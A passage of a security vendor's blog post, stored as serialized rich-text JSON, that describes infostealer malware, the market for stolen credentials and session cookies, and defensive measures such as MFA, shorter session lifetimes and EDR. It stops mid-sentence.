(",{"data":38245,"content":38247,"nodeType":940},{"uri":38246},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fsingle-sign-on-and-the-cybercrime-ecosystem\u002F",[38248],{"data":38249,"marks":38250,"value":38252,"nodeType":883},{},[38251],{"type":948},"Flare",{"data":38254,"marks":38255,"value":34611,"nodeType":883},{},[],{"data":38257,"content":38258,"nodeType":1535},{},[38259],{"data":38260,"content":38261,"nodeType":879},{},[38262,38266,38275],{"data":38263,"marks":38264,"value":38265,"nodeType":883},{},[],"Infostealer activity increased by 266% in 2023, while the number of attacks featuring valid credentials saw a 71% increase year-over-year (",{"data":38267,"content":38269,"nodeType":940},{"uri":38268},"https:\u002F\u002Fwww.ibm.com\u002Fdownloads\u002Fcas\u002FL0GKXDWJ",[38270],{"data":38271,"marks":38272,"value":38274,"nodeType":883},{},[38273],{"type":948},"IBM",{"data":38276,"marks":38277,"value":34611,"nodeType":883},{},[],{"data":38279,"content":38280,"nodeType":1535},{},[38281],{"data":38282,"content":38283,"nodeType":879},{},[38284,38288,38296],{"data":38285,"marks":38286,"value":38287,"nodeType":883},{},[],"147,000 token replay attacks were detected by Microsoft in 2023, an 111% increase year-over-year (",{"data":38289,"content":38291,"nodeType":940},{"uri":38290},"https:\u002F\u002Ftechcommunity.microsoft.com\u002Ft5\u002Fmicrosoft-entra-blog\u002Fhow-to-break-the-token-theft-cyber-attack-chain\u002Fba-p\u002F4062700",[38292],{"data":38293,"marks":38294,"value":13539,"nodeType":883},{},[38295],{"type":948},{"data":38297,"marks":38298,"value":1087,"nodeType":883},{},[],{"data":38300,"content":38301,"nodeType":1535},{},[38302],{"data":38303,"content":38304,"nodeType":879},{},[38305,38309,38318],{"data":38306,"marks":38307,"value":38308,"nodeType":883},{},[],"Over 1000 credentials are posted online per day, per marketplace with an average sale price of $10, and 65% posted less than one day after being collected (",{"data":38310,"content":38312,"nodeType":940},{"uri":38311},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fen-gb\u002Fresources\u002Freports\u002Fdbir\u002F",[38313],{"data":38314,"marks":38315,"value":38317,"nodeType":883},{},[38316],{"type":948},"Verizon",{"data":38319,"marks":38320,"value":34611,"nodeType":883},{},[],{"data":38322,"content":38323,"nodeType":1535},{},[38324],{"data":38325,"content":38326,"nodeType":879},{},[38327,38331,38339],{"data":38328,"marks":38329,"value":38330,"nodeType":883},{},[],"Nearly half of the malware detected last year by Sophos targeted victims’ data specifically, and the majority of that malware was classified as infostealers (",{"data":38332,"content":38334,"nodeType":940},{"uri":38333},"https:\u002F\u002Fnews.sophos.com\u002Fen-us\u002F2024\u002F03\u002F12\u002F2024-sophos-threat-report\u002F",[38335],{"data":38336,"marks":38337,"value":38338,"nodeType":883},{},[],"Sophos",{"data":38340,"marks":38341,"value":34611,"nodeType":883},{},[],{"data":38343,"content":38344,"nodeType":1535},{},[38345],{"data":38346,"content":38347,"nodeType":879},{},[38348,38352,38360],{"data":38349,"marks":38350,"value":38351,"nodeType":883},{},[],"Attacks on session cookies happen at the same order of magnitude as password-based attacks (",{"data":38353,"content":38355,"nodeType":940},{"uri":38354},"https:\u002F\u002Fgithub.com\u002FWICG\u002Fdbsc\u002Fissues\u002F13#issuecomment-1977657864",[38356],{"data":38357,"marks":38358,"value":36799,"nodeType":883},{},[38359],{"type":948},{"data":38361,"marks":38362,"value":34611,"nodeType":883},{},[],{"data":38364,"content":38365,"nodeType":1036},{},[38366],{"data":38367,"marks":38368,"value":38369,"nodeType":883},{},[],"How did we get here?",{"data":38371,"content":38372,"nodeType":879},{},[38373],{"data":38374,"marks":38375,"value":38376,"nodeType":883},{},[],"Let’s go back to the beginning. When they first emerged, infostealers were designed to steal online banking and credit card information. The most notable early example comes from as far back as 2006 with the ZeuS trojan. After the ZeuS source code was leaked in March 2011, the creation of multiple variants boosted the popularity of this type of malware and inspired the development of infostealers with increasingly sophisticated capabilities.",{"data":38378,"content":38379,"nodeType":879},{},[38380,38384,38393,38397,38406,38410,38419,38422,38431,38434,38443,38446,38455,38458,38467],{"data":38381,"marks":38382,"value":38383,"nodeType":883},{},[],"Modern infostealers rose to prominence in around 2018 with the emergence of ",{"data":38385,"content":38387,"nodeType":940},{"uri":38386},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.arkei_stealer",[38388],{"data":38389,"marks":38390,"value":38392,"nodeType":883},{},[38391],{"type":948},"Arkei",{"data":38394,"marks":38395,"value":38396,"nodeType":883},{},[],", which quickly spawned the more popular ",{"data":38398,"content":38400,"nodeType":940},{"uri":38399},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.vidar",[38401],{"data":38402,"marks":38403,"value":38405,"nodeType":883},{},[38404],{"type":948},"Vidar",{"data":38407,"marks":38408,"value":38409,"nodeType":883},{},[]," stealer. Today, some of the most popular families are ",{"data":38411,"content":38413,"nodeType":940},{"uri":38412},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.risepro",[38414],{"data":38415,"marks":38416,"value":38418,"nodeType":883},{},[38417],{"type":948},"RisePro",{"data":38420,"marks":38421,"value":2524,"nodeType":883},{},[],{"data":38423,"content":38425,"nodeType":940},{"uri":38424},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.redline_stealer",[38426],{"data":38427,"marks":38428,"value":38430,"nodeType":883},{},[38429],{"type":948},"RedLine",{"data":38432,"marks":38433,"value":2524,"nodeType":883},{},[],{"data":38435,"content":38437,"nodeType":940},{"uri":38436},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.stealc",[38438],{"data":38439,"marks":38440,"value":38442,"nodeType":883},{},[38441],{"type":948},"StealC",{"data":38444,"marks":38445,"value":2524,"nodeType":883},{},[],{"data":38447,"content":38449,"nodeType":940},{"uri":38448},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.raccoon",[38450],{"data":38451,"marks":38452,"value":38454,"nodeType":883},{},[38453],{"type":948},"Raccoon",{"data":38456,"marks":38457,"value":6198,"nodeType":883},{},[],{"data":38459,"content":38461,"nodeType":940},{"uri":38460},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Fdetails\u002Fwin.lumma",[38462],{"data":38463,"marks":38464,"value":38466,"nodeType":883},{},[38465],{"type":948},"Lumma",{"data":38468,"marks":38469,"value":38470,"nodeType":883},{},[],", with new variants and families appearing all the time. ",{"data":38472,"content":38473,"nodeType":879},{},[38474],{"data":38475,"marks":38476,"value":38477,"nodeType":883},{},[],"Infostealers are used by all manner of threat actors of varying levels of sophistication. For larger groups with sufficient resources, the creation of new, custom stealers and malware packages is a common tactic to attempt to evade detection. ",{"data":38479,"content":38480,"nodeType":879},{},[38481],{"data":38482,"marks":38483,"value":38484,"nodeType":883},{},[],"But despite all the variants, infostealers do have common capabilities and characteristics, such as:",{"data":38486,"content":38487,"nodeType":1531},{},[38488,38498,38508,38518,38528],{"data":38489,"content":38490,"nodeType":1535},{},[38491],{"data":38492,"content":38493,"nodeType":879},{},[38494],{"data":38495,"marks":38496,"value":38497,"nodeType":883},{},[],"Extracting information from the browsers of a compromised device, such as passwords, cookies, autofill information, downloaded file information.",{"data":38499,"content":38500,"nodeType":1535},{},[38501],{"data":38502,"content":38503,"nodeType":879},{},[38504],{"data":38505,"marks":38506,"value":38507,"nodeType":883},{},[],"Snapshotting the desktop and system inventory, with details such as the username, location data, hardware configuration, and information regarding installed security software.",{"data":38509,"content":38510,"nodeType":1535},{},[38511],{"data":38512,"content":38513,"nodeType":879},{},[38514],{"data":38515,"marks":38516,"value":38517,"nodeType":883},{},[],"Sending stolen data back to a C2 server.",{"data":38519,"content":38520,"nodeType":1535},{},[38521],{"data":38522,"content":38523,"nodeType":879},{},[38524],{"data":38525,"marks":38526,"value":38527,"nodeType":883},{},[],"Facilitating the deployment of additional tools and malware as part of a package. ",{"data":38529,"content":38530,"nodeType":1535},{},[38531],{"data":38532,"content":38533,"nodeType":879},{},[38534],{"data":38535,"marks":38536,"value":38537,"nodeType":883},{},[],"Often (but not always) self-terminating once complete, leaving little trace on the victim machine and no ongoing behavior that might be detected. ",{"data":38539,"content":38540,"nodeType":879},{},[38541],{"data":38542,"marks":38543,"value":38544,"nodeType":883},{},[],"Infostealers are distributed in similar ways to other types of malware, such as:",{"data":38546,"content":38547,"nodeType":1531},{},[38548,38558],{"data":38549,"content":38550,"nodeType":1535},{},[38551],{"data":38552,"content":38553,"nodeType":879},{},[38554],{"data":38555,"marks":38556,"value":38557,"nodeType":883},{},[],"Delivery of malicious executable files via phishing emails or by having a victim download content from a malicious website. ",{"data":38559,"content":38560,"nodeType":1535},{},[38561],{"data":38562,"content":38563,"nodeType":879},{},[38564],{"data":38565,"marks":38566,"value":38567,"nodeType":883},{},[],"‘Drive-by’ style attacks where the victim has only to visit an infected website.",{"data":38569,"content":38570,"nodeType":879},{},[38571,38575,38584,38587,38596,38599,38608,38612,38621],{"data":38572,"marks":38573,"value":38574,"nodeType":883},{},[],"They’re typically spread via malvertising, P2P downloads, and deceptive software download sites. ",{"data":38576,"content":38578,"nodeType":940},{"uri":38577},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Ffake-cheat-lures-gamers-into-spreading-infostealer-malware\u002F",[38579],{"data":38580,"marks":38581,"value":38583,"nodeType":883},{},[38582],{"type":948},"Gaming forums",{"data":38585,"marks":38586,"value":2524,"nodeType":883},{},[],{"data":38588,"content":38590,"nodeType":940},{"uri":38589},"https:\u002F\u002Fcybersecuritynews.com\u002Ffacebook-account-hijack-malware\u002F",[38591],{"data":38592,"marks":38593,"value":38595,"nodeType":883},{},[38594],{"type":948},"Facebook ads",{"data":38597,"marks":38598,"value":6198,"nodeType":883},{},[],{"data":38600,"content":38602,"nodeType":940},{"uri":38601},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Flumma-variant-on-youtube",[38603],{"data":38604,"marks":38605,"value":38607,"nodeType":883},{},[38606],{"type":948},"YouTube video descriptions",{"data":38609,"marks":38610,"value":38611,"nodeType":883},{},[]," are popular locations for malicious links, but recent examples also include ",{"data":38613,"content":38615,"nodeType":940},{"uri":38614},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-3-000-github-accounts-used-by-malware-distribution-service\u002F",[38616],{"data":38617,"marks":38618,"value":38620,"nodeType":883},{},[38619],{"type":948},"complex malware distribution networks on GitHub",{"data":38622,"marks":38623,"value":38624,"nodeType":883},{},[]," – such as the recent campaign from ‘Stargazer Goblin’ with more than 3,000 fake accounts creating and promoting hundreds of fake repositories to increase their apparent legitimacy and make them more likely to appear on GitHub's trending section.",{"data":38626,"content":38627,"nodeType":905},{},[],{"data":38629,"content":38630,"nodeType":909},{},[38631],{"data":38632,"marks":38633,"value":38634,"nodeType":883},{},[],"Infostealers are key to the cybercrime ecosystem",{"data":38636,"content":38637,"nodeType":879},{},[38638,38642,38650],{"data":38639,"marks":38640,"value":38641,"nodeType":883},{},[],"After being stolen, ",{"data":38643,"content":38644,"nodeType":940},{"uri":38246},[38645],{"data":38646,"marks":38647,"value":38649,"nodeType":883},{},[38648],{"type":948},"infostealer data inevitably finds its way onto hacker forums and marketplaces",{"data":38651,"marks":38652,"value":38653,"nodeType":883},{},[],", both on the clearweb and darkweb. Popular infostealers have their own dedicated Telegram channels to advertise and sell stolen data. Private channels also exist, with the channel owner distributing tens of thousands of logs per week to a limited number of threat actors who pay $200-$400 for access to the channel. This allows them to get ‘first pick’ of stolen logs, which are later shared through public Telegram channels. ",{"data":38655,"content":38656,"nodeType":879},{},[38657,38661,38670],{"data":38658,"marks":38659,"value":38660,"nodeType":883},{},[],"Public data eventually makes its way onto services such as Have I Been Pwned (HIBP), which gives individuals and security teams some visibility of which credentials have been compromised. For example, ",{"data":38662,"content":38664,"nodeType":940},{"uri":38663},"https:\u002F\u002Fwww.troyhunt.com\u002Ftelegram-combolists-and-361m-email-addresses\u002F",[38665],{"data":38666,"marks":38667,"value":38669,"nodeType":883},{},[38668],{"type":948},"in June, Troy Hunt (creator of HIBP) wrote",{"data":38671,"marks":38672,"value":38673,"nodeType":883},{},[]," about the impact of channels like Telegram and the sale of combolists (username, password, login portal URL), after being sent 122GB of data scraped out of thousands of Telegram channels, containing 361M unique email addresses (of which 151M had never been seen in HIBP before). ",{"data":38675,"content":38676,"nodeType":879},{},[38677],{"data":38678,"marks":38679,"value":38680,"nodeType":883},{},[],"The cybercrime ecosystem is complex, with a developed supply chain and organizations fulfilling different roles as a result: from malware-as-a-service developers, to initial access brokers, to the operators that actually conduct the attacks (be they ransomware, data theft, etc.) – and many, many other roles in between. Sometimes, a single group and\u002For its affiliates will conduct the full chain, but this is far less common today. ",{"data":38682,"content":38683,"nodeType":879},{},[38684,38687,38696],{"data":38685,"marks":38686,"value":21,"nodeType":883},{},[],{"data":38688,"content":38690,"nodeType":940},{"uri":38689},"https:\u002F\u002Fwww.secureworks.com\u002Fresearch\u002Fthe-growing-threat-from-infostealers",[38691],{"data":38692,"marks":38693,"value":38695,"nodeType":883},{},[38694],{"type":948},"Infostealers are often sold by malware developers to other attackers as a monthly subscription service.",{"data":38697,"marks":38698,"value":38699,"nodeType":883},{},[]," The price can range from $50 to over $1,000 USD per month for access to a stealer command and control (C2) server operated by the developer. The service often features a range of support functions, including multiple ways to view, download, and share stolen data. Self-hosted stealer C2 servers are also available and are usually sold for a flat fee. ",{"data":38701,"content":38702,"nodeType":879},{},[38703],{"data":38704,"marks":38705,"value":38706,"nodeType":883},{},[],"There’s also evidence that there is an element of target coordination – with one marketplace, Russian Market, allowing users to ‘preorder’ credentials for a $1,000 USD deposit from 2022. ",{"data":38708,"content":38709,"nodeType":879},{},[38710,38715],{"data":38711,"marks":38712,"value":38714,"nodeType":883},{},[38713],{"type":916},"So what? Well, there's evidently an abundance of breached data already online, and attackers have the tools readily available to have this pile grow exponentially bigger and more useful.",{"data":38716,"marks":38717,"value":38718,"nodeType":883},{},[]," It’s also probably more coordinated than we like to admit – a particularly intimidating prospect in the wake of Snowflake, which will no doubt have many criminals smelling blood in the water. ",{"data":38720,"content":38721,"nodeType":905},{},[],{"data":38723,"content":38724,"nodeType":909},{},[38725],{"data":38726,"marks":38727,"value":38728,"nodeType":883},{},[],"How can stolen data be abused by attackers? ",{"data":38730,"content":38731,"nodeType":879},{},[38732],{"data":38733,"marks":38734,"value":38735,"nodeType":883},{},[],"It’s pretty obvious that attackers getting access to all of your passwords and session cookies is bad, but there is a clear value hierarchy from a corporate security perspective. So, from highest to lowest risk:",{"data":38737,"content":38738,"nodeType":1531},{},[38739,38754,38769],{"data":38740,"content":38741,"nodeType":1535},{},[38742],{"data":38743,"content":38744,"nodeType":879},{},[38745,38750],{"data":38746,"marks":38747,"value":38749,"nodeType":883},{},[38748],{"type":916},"Stolen session cookies",{"data":38751,"marks":38752,"value":38753,"nodeType":883},{},[]," simply need to be imported into an attacker’s browser to resume an active session on an app. That means access can be gained without needing to enter a username and password, or pass any MFA checks. ",{"data":38755,"content":38756,"nodeType":1535},{},[38757],{"data":38758,"content":38759,"nodeType":879},{},[38760,38765],{"data":38761,"marks":38762,"value":38764,"nodeType":883},{},[38763],{"type":916},"Stolen usernames, passwords",{"data":38766,"marks":38767,"value":38768,"nodeType":883},{},[],", and login page URLs can be used to access any accounts that lack MFA. ",{"data":38770,"content":38771,"nodeType":1535},{},[38772],{"data":38773,"content":38774,"nodeType":879},{},[38775,38780],{"data":38776,"marks":38777,"value":38779,"nodeType":883},{},[38778],{"type":916},"Stolen autofill data",{"data":38781,"marks":38782,"value":38783,"nodeType":883},{},[]," can be used to gather other valuable information that could be useful for impersonating the victim when speaking to social engineering IT support staff, for example to reset or remove MFA.",{"data":38785,"content":38786,"nodeType":879},{},[38787],{"data":38788,"marks":38789,"value":38790,"nodeType":883},{},[],"Naturally, stolen session cookies are the most valuable prize, but they are often valid for only a limited time before the user must re-authenticate, and active sessions can often be terminated by security admins. Unfortunately, it’s not that uncommon for sessions to last for up to a month, or even sometimes indefinitely.",{"data":38792,"content":38793,"nodeType":879},{},[38794],{"data":38795,"marks":38796,"value":38797,"nodeType":883},{},[],"Stolen usernames and passwords are a different story. As the Snowflake breaches demonstrate, passwords can remain valid for years after a breach, particularly in the world of SaaS apps where mandatory password rotation is not as common as for a user’s primary domain account.",{"data":38799,"content":38800,"nodeType":879},{},[38801,38805,38813],{"data":38802,"marks":38803,"value":38804,"nodeType":883},{},[],"There’s also the problem of ",{"data":38806,"content":38808,"nodeType":940},{"uri":38807},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fghost-logins-when-forgotten-identities-come-back-to-haunt-you\u002F",[38809],{"data":38810,"marks":38811,"value":1592,"nodeType":883},{},[38812],{"type":948},{"data":38814,"marks":38815,"value":38816,"nodeType":883},{},[]," – where a local login with a username and password (and probably lacking MFA) can exist alongside other, more secure login methods such as SSO. Given the fact that many apps are self-adopted by users, these accounts continue to exist even when an app is subsequently added to SSO via the chosen IdP, meaning they can fly under the radar of security teams. ",{"data":38818,"content":38819,"nodeType":905},{},[],{"data":38821,"content":38822,"nodeType":909},{},[38823],{"data":38824,"marks":38825,"value":38826,"nodeType":883},{},[],"Should you be concerned about infostealers?",{"data":38828,"content":38829,"nodeType":879},{},[38830],{"data":38831,"marks":38832,"value":38833,"nodeType":883},{},[],"It’s commonly thought that infostealers are primarily a concern for unmanaged devices that lack security controls common to corporate IT, such as EDR. But there’s a couple of reasons why corporate users are also at risk:",{"data":38835,"content":38836,"nodeType":1036},{},[38837],{"data":38838,"marks":38839,"value":38840,"nodeType":883},{},[],"EDR can be bypassed",{"data":38842,"content":38843,"nodeType":879},{},[38844,38848,38857],{"data":38845,"marks":38846,"value":38847,"nodeType":883},{},[],"EDR is seen as the go-to solution for defending against infostealer malware. However, attackers are always looking for ways to get around security controls by obfuscating malicious behavior and evading signature-based checks. For example, ",{"data":38849,"content":38851,"nodeType":940},{"uri":38850},"https:\u002F\u002Fthehackernews.com\u002F2024\u002F07\u002Fmicrosoft-defender-flaw-exploited-to.html",[38852],{"data":38853,"marks":38854,"value":38856,"nodeType":883},{},[38855],{"type":948},"a flaw in Microsoft Defender SmartScreen was recently exploited to deliver infostealer malware",{"data":38858,"marks":38859,"value":1350,"nodeType":883},{},[],{"data":38861,"content":38862,"nodeType":879},{},[38863],{"data":38864,"marks":38865,"value":38866,"nodeType":883},{},[],"Getting total coverage across your endpoint estate is notoriously difficult, if not totally unrealistic. Unless the malware is stopped on execution, then data will inevitably be stolen, and will continue to be taken until stopped (or it self-terminates). And once an attacker has stolen employee credentials or sessions, the credential stuffing and session hijacking attacks that come next won’t touch the endpoint. For those reasons, you can’t rely on EDR as a single line of defense against infostealers.",{"data":38868,"content":38869,"nodeType":1036},{},[38870],{"data":38871,"marks":38872,"value":38873,"nodeType":883},{},[],"Unmanaged devices such as BYOD or third-parties are vulnerable",{"data":38875,"content":38876,"nodeType":879},{},[38877],{"data":38878,"marks":38879,"value":38880,"nodeType":883},{},[],"Companies that support BYOD often have less secure configurations than those with fully managed devices. The same applies to third-party contractors, who often use their own devices to access company systems on a temporary basis. ",{"data":38882,"content":38883,"nodeType":879},{},[38884,38888,38897],{"data":38885,"marks":38886,"value":38887,"nodeType":883},{},[],"This issue was acutely felt in the Snowflake attacks: There is some suggestion that targeting key third-party suppliers – ",{"data":38889,"content":38891,"nodeType":940},{"uri":38890},"https:\u002F\u002Fwww.wired.com\u002Fstory\u002Fepam-snowflake-ticketmaster-breach-shinyhunters\u002F",[38892],{"data":38893,"marks":38894,"value":38896,"nodeType":883},{},[38895],{"type":948},"such as EPAM Systems, a software engineering firm and Snowflake ‘Elite Tier Partner’",{"data":38898,"marks":38899,"value":38900,"nodeType":883},{},[]," – yielded some of the access needed. It’s unclear what came first, but it’s possible (likely, even) that EPAM was identified as a target specifically because of its lucrative customer base – third-parties are a known weak point for red teamers, so it would be foolish to assume that attackers don’t also think this way. It’s possible too that EPAM were specifically targeted because of their Snowflake chops – adding another indicator that Snowflake was potentially a premeditated attack inspired by the availability of Snowflake credentials online. ",{"data":38902,"content":38903,"nodeType":1036},{},[38904],{"data":38905,"marks":38906,"value":38907,"nodeType":883},{},[],"Browser profiles can be synced across devices, increasing the blast radius",{"data":38909,"content":38910,"nodeType":879},{},[38911],{"data":38912,"marks":38913,"value":38914,"nodeType":883},{},[],"It’s not uncommon for employees to access their personal email accounts from company devices. When accessing any browser, you are typically prompted to sign in with your account credentials (e.g. your Google account). If a user signs into a browser on a company device with a personal account, you’re usually prompted to sync your account across devices. This usually means that any saved passwords, search history, and settings are shared across devices. ",{"data":38916,"content":38917,"nodeType":879},{},[38918],{"data":38919,"marks":38920,"value":38921,"nodeType":883},{},[],"Naturally, this means that if a personal device is compromised where you’re also logged into the browser profile, then an infostealer will be able to harvest information saved into that profile across devices.",{"data":38923,"content":38924,"nodeType":879},{},[38925],{"data":38926,"marks":38927,"value":38928,"nodeType":883},{},[],"Even when using separate browser profiles for work and personal, it’s easy for the two to converge, or to slip into using the wrong profile. Accessing personal accounts (or at least synchronizing data across accounts) is usually a workplace policy violation, but it’s unfortunately all too common. ",{"data":38930,"content":38931,"nodeType":879},{},[38932,38936,38945],{"data":38933,"marks":38934,"value":38935,"nodeType":883},{},[],"Previous vulnerabilities have exacerbated this problem, such as ",{"data":38937,"content":38939,"nodeType":940},{"uri":38938},"https:\u002F\u002Fthehackernews.com\u002F2024\u002F01\u002Fmalware-using-google-multilogin-exploit.html",[38940],{"data":38941,"marks":38942,"value":38944,"nodeType":883},{},[38943],{"type":948},"an exploit affecting Google MultiLogin to maintain access to synced accounts even after a password reset",{"data":38946,"marks":38947,"value":3386,"nodeType":883},{},[],{"data":38949,"content":38950,"nodeType":1036},{},[38951],{"data":38952,"marks":38953,"value":38954,"nodeType":883},{},[],"Are infostealers a bigger problem than credential phishing? ",{"data":38956,"content":38957,"nodeType":879},{},[38958],{"data":38959,"marks":38960,"value":38961,"nodeType":883},{},[],"The short answer is: No. The longer answer is: They are both part of the bigger problem of identity attacks, and attackers can wield both approaches simultaneously. ",{"data":38963,"content":38964,"nodeType":879},{},[38965],{"data":38966,"marks":38967,"value":38968,"nodeType":883},{},[],"While they are delivered to victims in similar ways to phishing links, most organizations are arguably better protected against infostealers than modern phishing attacks because endpoint security controls provide another layer of protection, in theory – whereas modern phishing attacks don’t necessarily involve the delivery of malware that executes on the device. ",{"data":38970,"content":38971,"nodeType":879},{},[38972],{"data":38973,"marks":38974,"value":38975,"nodeType":883},{},[],"Infostealers arguably provide more bang for the attacker’s buck, grabbing a stack of credentials and useful data in one go. In contrast, phishing is usually much more targeted, and involves the compromise of a narrower set of credentials – typically focusing on a particular site or app. ",{"data":38977,"content":38978,"nodeType":879},{},[38979,38983,38992,38996,39004],{"data":38980,"marks":38981,"value":38982,"nodeType":883},{},[],"It’s worth focusing on the TTP, not the particular tool being used: The attacker technique here is ",{"data":38984,"content":38986,"nodeType":940},{"uri":38985},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fsession_cookie_theft\u002Fdescription.md",[38987],{"data":38988,"marks":38989,"value":38991,"nodeType":883},{},[38990],{"type":948},"session cookie theft",{"data":38993,"marks":38994,"value":38995,"nodeType":883},{},[],", and subsequently session hijacking by importing the cookie into the attacker’s browser. Both infostealers and ",{"data":38997,"content":38999,"nodeType":940},{"uri":38998},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fphishing-2-0-how-phishing-toolkits-are-evolving-with-aitm\u002F",[39000],{"data":39001,"marks":39002,"value":39003,"nodeType":883},{},[],"modern phishing attacks",{"data":39005,"marks":39006,"value":39007,"nodeType":883},{},[]," involve the theft of session tokens, and so are valid means to achieve this end. In fact, there’s nothing to stop threat groups from employing both simultaneously.",{"data":39009,"content":39013,"nodeType":971},{"target":39010},{"sys":39011},{"id":39012,"type":976,"linkType":977},"7fil6aaQDFfJGYUnQ14k10",[],{"data":39015,"content":39016,"nodeType":905},{},[],{"data":39018,"content":39019,"nodeType":909},{},[39020],{"data":39021,"marks":39022,"value":39023,"nodeType":883},{},[],"Infostealers in action",{"data":39025,"content":39026,"nodeType":879},{},[39027],{"data":39028,"marks":39029,"value":39030,"nodeType":883},{},[],"Check out the video demo below to see the attack chain in action from the point of an infostealer compromise, showing session cookie theft, reimporting the cookies into the attacker's browser, and evading policy-based controls in M365. It also shows the targeting of downstream apps that are usually accessed via SSO in the context of both a Microsoft Entra and Okta compromise.",{"data":39032,"content":39036,"nodeType":971},{"target":39033},{"sys":39034},{"id":39035,"type":976,"linkType":977},"4J7LqqjQX2W52AbmcVmjUt",[],{"data":39038,"content":39039,"nodeType":909},{},[39040],{"data":39041,"marks":39042,"value":39043,"nodeType":883},{},[],"What can organizations do about the infostealer threat? ",{"data":39045,"content":39046,"nodeType":879},{},[39047],{"data":39048,"marks":39049,"value":39050,"nodeType":883},{},[],"Security teams should have two main concerns:",{"data":39052,"content":39053,"nodeType":1531},{},[39054,39064],{"data":39055,"content":39056,"nodeType":1535},{},[39057],{"data":39058,"content":39059,"nodeType":879},{},[39060],{"data":39061,"marks":39062,"value":39063,"nodeType":883},{},[],"Data that is already out there from historical data dumps, but is still valid. ",{"data":39065,"content":39066,"nodeType":1535},{},[39067],{"data":39068,"content":39069,"nodeType":879},{},[39070],{"data":39071,"marks":39072,"value":39073,"nodeType":883},{},[],"Data in private channels that attackers could use in the future, that you are blind to. ",{"data":39075,"content":39076,"nodeType":879},{},[39077],{"data":39078,"marks":39079,"value":39080,"nodeType":883},{},[],"As always, the root-cause of the problem is a lack of meaningful visibility of what apps your employees are using (including those outside your IdP) and whether the associated identities are configured securely. ",{"data":39082,"content":39083,"nodeType":879},{},[39084],{"data":39085,"marks":39086,"value":39087,"nodeType":883},{},[],"A layered, defense-in-depth approach is required to resolve the issue, by:",{"data":39089,"content":39090,"nodeType":1531},{},[39091,39101,39111,39121],{"data":39092,"content":39093,"nodeType":1535},{},[39094],{"data":39095,"content":39096,"nodeType":879},{},[39097],{"data":39098,"marks":39099,"value":39100,"nodeType":883},{},[],"Deploying MFA across all your identities and apps, including any local logins that can’t be put behind SSO. ",{"data":39102,"content":39103,"nodeType":1535},{},[39104],{"data":39105,"content":39106,"nodeType":879},{},[39107],{"data":39108,"marks":39109,"value":39110,"nodeType":883},{},[],"Configuring time-limited session lifetimes for all apps to ensure that any stolen session tokens can only be used temporarily. ",{"data":39112,"content":39113,"nodeType":1535},{},[39114],{"data":39115,"content":39116,"nodeType":879},{},[39117],{"data":39118,"marks":39119,"value":39120,"nodeType":883},{},[],"Ensuring that employees don’t access or synchronize personal accounts on their work devices, as well as limiting non-work activities on their work device as much as possible.",{"data":39122,"content":39123,"nodeType":1535},{},[39124],{"data":39125,"content":39126,"nodeType":879},{},[39127],{"data":39128,"marks":39129,"value":39130,"nodeType":883},{},[],"Implementing a robust EDR\u002FMDR solution to detect and respond to malware compromises on user devices. ",{"data":39132,"content":39133,"nodeType":879},{},[39134,39138,39143],{"data":39135,"marks":39136,"value":39137,"nodeType":883},{},[],"Organizations also have the option of investing in a commercial TI feed to detect and report data breaches affecting employees. But in our experience, these feeds contain ",{"data":39139,"marks":39140,"value":39142,"nodeType":883},{},[39141],{"type":916},"a lot ",{"data":39144,"marks":39145,"value":39146,"nodeType":883},{},[],"of false positives – so unless you have password visibility for employee accounts across apps, it’s going to waste a chunk of valuable time for you and your employees.",{"data":39148,"content":39149,"nodeType":879},{},[39150,39154,39163],{"data":39151,"marks":39152,"value":39153,"nodeType":883},{},[],"It would be remiss of us not to mention our recently released ",{"data":39155,"content":39157,"nodeType":940},{"uri":39156},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fintroducing-session-token-theft-detection-why-browser-is-best\u002F",[39158],{"data":39159,"marks":39160,"value":39162,"nodeType":883},{},[39161],{"type":948},"session token theft detection feature",{"data":39164,"marks":39165,"value":39166,"nodeType":883},{},[]," that identifies session token theft by adding telemetry to the user agent string – using the power of our browser agent to create a new high-fidelity signal for security teams. It can also be applied more generally to detect any session taking place in an unmanaged browser – so you can use it to spot unauthorized access to company apps in general, too.  ",{"data":39168,"content":39172,"nodeType":971},{"target":39169},{"sys":39170},{"id":39171,"type":976,"linkType":977},"3XgpqEGzZSD2J0uvnCg5D8",[],{"data":39174,"content":39175,"nodeType":1036},{},[39176],{"data":39177,"marks":39178,"value":39179,"nodeType":883},{},[],"What’s next for infostealers?",{"data":39181,"content":39182,"nodeType":879},{},[39183],{"data":39184,"marks":39185,"value":39186,"nodeType":883},{},[],"All the signs point to the fact that infostealers will continue being a useful tool in the attacker’s arsenal. The Snowflake attacks in particular are both a warning for defenders and encouragement for attackers. It's also a good reminder that while infostealers were once used to harvest things like VPN creds to pivot to the internal network, they're now largely used to target third-party services over the internet. ",{"data":39188,"content":39189,"nodeType":879},{},[39190],{"data":39191,"marks":39192,"value":39193,"nodeType":883},{},[],"To evade EDR, it’s likely that we’ll see a growing number of families and variants used by individual groups, or better ‘enterprise’ capabilities from malware-as-a-service vendors. ",{"data":39195,"content":39196,"nodeType":879},{},[39197,39201,39210,39214,39222],{"data":39198,"marks":39199,"value":39200,"nodeType":883},{},[],"One notable quirk is that, to date, infostealers have not really branched out from targeting browsers. Take the example of password manager apps – you would think this would be an obvious target, right? But, they’re not usually targeted 